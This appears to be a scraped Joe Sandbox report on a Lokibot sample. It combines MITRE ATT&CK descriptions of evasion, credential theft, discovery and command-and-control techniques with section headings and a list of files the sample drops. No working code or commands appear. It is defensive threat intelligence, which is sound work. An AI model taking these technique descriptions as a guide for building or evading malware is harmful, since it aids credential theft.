Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FVR-N2411-07396.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FVR-N2411-07396.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZeJFfrYmOnJKS.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afwgsupc.i30.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5y2zi1h.gk2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebabrywo.lxv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrb43vfc.g4p.psm1

C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp

C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Windows Analysis Report
FVR-N2411-07396.exe

Function 07207AF5 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Function 07207B00 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre